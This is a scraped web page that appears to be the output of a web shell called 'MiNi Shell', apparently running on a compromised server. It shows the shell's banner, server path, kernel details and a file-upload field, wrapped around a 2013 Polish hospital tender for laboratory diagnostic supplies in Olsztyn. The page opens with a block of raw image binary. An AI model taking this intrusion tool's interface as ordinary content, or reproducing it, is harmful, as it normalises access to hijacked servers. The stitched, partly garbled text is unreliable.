JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130516/78171-N-2013.html

<p class="kh_header"><b>Olsztyn: ZAOPATRZENIE  DZIAŁU DIAGNOSTYKI LABORATORYJNEJ 
W  SPZGICHP</b><br>
<b>Numer ogłoszenia: 78171 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc , ul. Jagiellońska 78, 10-357 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5322966, faks 089 5322979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulmonologia.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAOPATRZENIE  DZIAŁU DIAGNOSTYKI LABORATORYJNEJ 
W  SPZGICHP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego postępowania przetargowego jest sukcesywne zaopatrzenie Działu Diagnostyki Laboratoryjnej w asortymencie i ilości określonej w Załączniku Nr 2 do niniejszej SIWZ. 
2.   Szczegółowy opis przedmiotu zamówienia oraz ilość zostały określone w Załączniku Nr 2 cz. 1 i cz. 2  do SIWZ. 
      3.     Przedmiot zamówienia powinien:    
      a)  posiadać deklarację zgodności bądź świadectwo rejestracji,                                                                                              b)  posiadać oznakowanie znakiem zgodności CE,                                                                                                      c)  posiadać wysoką jakość i spełniać funkcję do jakiej został przeznaczony,
      d)  posiadać karty charakterystyki substancji lub zaświadczenie, że nie są wymagane,
e) spełniać wymagania określone w ustawie z dnia 18 marca 2011 roku o Urzędzie Rejestracji     Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Dz. U.  Nr  82,  poz. 451 ze zm.),
f) spełniać wymagania określone ustawie z dnia 20 maja 2010 roku o wyrobach medycznych                     (Dz. U. Nr 107, poz. 679 ze zmianami), 
      g) spełniać wymagania określone rozporządzenia Ministra Zdrowia z dnia 12 stycznia 2011 roku                      w sprawie wymagań zasadniczych dla wyrobów medycznych do diagnostyki in vitro (Dz. U. Nr 16, poz. 75)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-9, 38.43.40.00-6, 33.60.00.00-6, 33.69.65.00-0, 33.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 105.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zgodnie z art. 45 ust. 1 ustawy Zamawiający wymaga  wniesienia wadium w wysokości:  

Pakiet 1: 3964,00 zł
Pakiet 2: 2070,00 zł
Pakiet 3: 876,40 zł 
Pakiet 4: 256,90 zł 
Pakiet 5: 5,50 zł
Pakiet 6: 54,60 zł
Pakiet 7: 79,45 zł
Pakiet 8 : 679,00 zł
Pakiet 9: 2180,00 zł
Pakiet 10:
poz. 1 - 69,55 zł
poz. 2 - 5,00 zł
poz. 3 - 53,50 zł
poz. 4 - 30,25 zł
poz. 5 -  19,90 zł
poz. 6 -  0,30 zł
poz. 7 -   0,30 zł
poz. 8  - 70,00 zł
poz. 9 -  3,20 zł
poz. 10 - 0,70 zł
poz. 11 - 0,70 zł 
poz.12 - 1,35 zł
poz. 13 - 4,20 zł
poz.14 - 0,15 zł
poz. 15 - 0,60 zł
poz. 16 - 0,70 zł
poz. 17 - 2, 60 zł
poz. 18 - 0,90 zł
poz. 19 - 40,50 zł
poz. 20 - 2,50 zł
poz. 21 - 2,50 zł
poz. 23 - 0,90 zł
poz. 24 - 7,40 zł
poz. 25 - 11,80 zł
poz. 26 - 3,10 zł
poz. 27 - 2,60 zł
poz. 28 - 11,10 zł
poz. 29 - 2,60 zł
poz. 30 - 24,60 zł
poz. 31 - 3,50 zł
poz. 32 - 33,95 zł
poz. 33 - 1,40 zł
poz. 34 - 71,60 zł
poz. 35 - 0,95 zł
poz. 36 - 3,70 zł
poz. 37 - 2,15 zł
poz. 38 - 0,75 zł
poz. 39 - 1,25 zł
poz. 40 - 15,80 zł
poz. 41 - 6,25 zł
poz. 42 - 21,70 zł
poz. 43 - 6,95 zł
poz. 44 - 3,55 zł
poz. 45 - 3,00 zł
poz. 46 - 64,80 zł
poz. 47 - 86,40 zł
poz. 48 - 17,30 zł
poz. 49 - 45,40 zł
poz. 50 - 22,70 zł
poz. 51 - 97,20 zł 
poz. 52 - 48,60 zł
poz. 53 - 10,80 zł
poz. 54 - 38,90 zł
poz. 55 - 129, 60 zł
poz. 56 - 110,20 zł
poz. 57 - 54,00 zł
Pakiet 11: 5358, 20 zł
Pakiet 12: 1594,75 zł
Pakiet 13: 3395,55 zł 
Pakiet 14: 3311,15 zł
Pakiet 15: 
poz. 1 - 62,60 zł
poz. 2 - 12,85 zł
poz. 3 - 9,70 zł
poz. 4 - 36,30 zł
poz. 5 - 9,60 zł
poz. 6 - 4, 50 zł
poz. 7 - 0,65 zł
poz. 8 - 3,75 zł
poz. 9 - 1,10 zł
poz. 10 - 60,50 zł
poz. 11 - 1,85 zł
poz. 12 - 0,40 zł
poz. 13 - 5,20 zł
poz 14 - 1,00 zł
poz. 15 - 1,10 zł
poz. 16 - 7,60 zł
poz. 17 - 0,20 zł
poz. 18 - 0,20 zł
poz. 19 - 22,35 zł
poz. 20 - 0,60 zł
poz. 21 - 0,10 zł
poz. 22 - 1,20 zł 
poz. 23 - 15,15 zł
poz. 24 - 0,70 zł
poz. 25 - 0,05 zł
poz. 26 - 1,40 zł
poz. 27 - 3,25 zł
poz. 28 - 4,70 zł
poz. 29 - 2,75 zł
poz. 30 - 31,10 zł
poz. 31 - 839,80 zł
poz. 32 - 2,70 zł
poz. 33 - 4,00 zł
poz. 34 - 0,55 zł
poz. 35  - 0,55 zł  

 2.  Wadium może być wniesione w następujących formach:
a) pieniądzu - przelewem na rachunek bankowy: Bank Millennium S.A   77   1160   2202  0000  0000  6193  7410 
b) poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,                z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c)  gwarancjach bankowych,
     d)  gwarancjach ubezpieczeniowych,                                                                                                                     e)  poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b ust. 5 pkt 2   ustawy z dnia  9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 roku, Nr 42, poz. 275). 
3. Wadium wniesione w formie innej niż pieniężna winno być przesłane na adres Zespołu do dnia 19.06.2013 roku do  godz. 10:00,  w  osobnej  kopercie  z nazwą Wykonawcy, z dopiskiem WADIUM - ZAOPATRZENIE DZIAŁU DIAGNOSTYKI LABORATORYJNEJ W SPZGICHP (zaleca się dołączenie  do oferty dowodu przelewu, bądź kopii dokumentów określonych w pkt 2 lit. b do e).
4.  Zamawiający zwraca niezwłocznie  wadium w przypadkach określonych w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku, Wykonawca winien przedłożyć oświadczenie Wykonawcy o spełnianiu warunków określonych przez Zamawiającego  w Rozdziale IV SIWZ, pkt 1 lit. a, b,  - Załącznik Nr 3.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku, Wykonawca winien przedłożyć:
	wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży analizatora biochemicznego wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 2) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje),  
	wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży czytnika pasków diagnostycznych do wykonywania badań ogólnego moczu  wraz z paskami i odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 7) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje), 
wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży analizatora do immunochemii wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 8) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje), 
	wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży aparatu do badań z zakresu immunologii transfuzjologicznej wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 9) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje), 
	wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży aparatu do hodowli krwi i płynów ustrojowych wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 11) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje) oraz oświadczenie Wykonawcy o spełnianiu warunków określonych przez Zamawiającego  w Rozdziale IV SIWZ, pkt 1 lit. a, b,  - Załącznik Nr 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku, Wykonawca winien przedłożyć:wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży analizatora biochemicznego wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 2) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje),  
wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży czytnika pasków diagnostycznych do wykonywania badań ogólnego moczu  wraz z paskami i odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 7) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje), 
wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży analizatora do immunochemii wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 8) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje), 
wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży aparatu do badań z zakresu immunologii transfuzjologicznej wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 9) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje), 
wykaz min. dwóch zrealizowanych bądź realizowanych umów dzierżawy sprzedaży aparatu do hodowli krwi i płynów ustrojowych wraz z odczynnikami o wartości nie niższej niż 10 000,00 zł brutto (dotyczy Pakietu 11) w okresie ostatnich trzech lat przed złożeniem niniejszej oferty oraz załączeniem dokumentów potwierdzających, że umowy te zostały bądź są wykonywane należycie (np. referencje) oraz oświadczenie Wykonawcy o spełnianiu warunków określonych przez Zamawiającego  w Rozdziale IV SIWZ, pkt 1 lit. a, b,  - Załącznik Nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pozostałe dokumenty, które należy dołączyć do oferty:
9.1  wypełniony i podpisany Formularz ofertowy - Załącznik Nr 1,
     9.2  wypełniony i podpisany Formularz cenowy - Załącznik Nr 2, 
  9.3 aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej  prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego,
9.4 oświadczenie o posiadaniu świadectwa rejestracji produktów, wydanego przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych dopuszczonych do obrotu na terytorium Rzeczpospolitej Polskiej, deklarację zgodności, bądź pozwolenie wydane przez Radę Unii Europejskiej lub Komisję Europejską - dotyczy odczynników, drobnego sprzętu jednorazowego użytku, oznaczeń, analizatora biochemicznego, czytnika pasków diagnostycznych do wykonywania badania ogólnego moczu, aparatu do immunochemii, aparatu do badań z zakresu immunologii transfuzjologicznej, aparatu do hodowli krwi i płynów ustrojowych.
9.5 Aktualne certyfikaty walidacji dla oferowanych aparatów i analizatorów (Pakiet 2, Pakiet 7, Pakiet 8, Pakiet 9, Pakiet 11) ważne przez okres 36 miesięcy.
9.6 karty charakterystyki substancji lub zaświadczenie, że nie są wymagane
9.7 pozostałe dokumenty określone w Załączniku 2 do niniejszej SIWZ przy określonych pakietach oraz oświadczenie Wykonawcy o spełnianiu warunków określonych przez Zamawiającego  w Rozdziale IV SIWZ, pkt 1 lit. a, b,  - Załącznik Nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe dokumenty, które należy dołączyć do oferty:
1.  wypełniony i podpisany Formularz ofertowy - Załącznik Nr 1,
2.  wypełniony i podpisany Formularz cenowy - Załącznik Nr 2, 
3. aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej  prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego,
4. oświadczenie o posiadaniu świadectwa rejestracji produktów, wydanego przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych dopuszczonych do obrotu na terytorium Rzeczpospolitej Polskiej, deklarację zgodności, bądź pozwolenie wydane przez Radę Unii Europejskiej lub Komisję Europejską - dotyczy odczynników, drobnego sprzętu jednorazowego użytku, oznaczeń, analizatora biochemicznego, czytnika pasków diagnostycznych do wykonywania badania ogólnego moczu, aparatu do immunochemii, aparatu do badań z zakresu immunologii transfuzjologicznej, aparatu do hodowli krwi i płynów ustrojowych.
5. Aktualne certyfikaty walidacji dla oferowanych aparatów i analizatorów (Pakiet 2, Pakiet 7, Pakiet 8, Pakiet 9, Pakiet 11) ważne przez okres 36 miesięcy.
6. karty charakterystyki substancji lub zaświadczenie, że nie są wymagane
7. pozostałe dokumenty określone w Załączniku 2 do niniejszej SIWZ przy określonych pakietach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pulmonologia.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul, Jagiellońska 78
10-357 Olsztyn
Budynek główny, III piętro, pok. 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul, Jagiellońska 78
10-357 Olsztyn
Budynek główny, III piętro, sala konferencyjna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com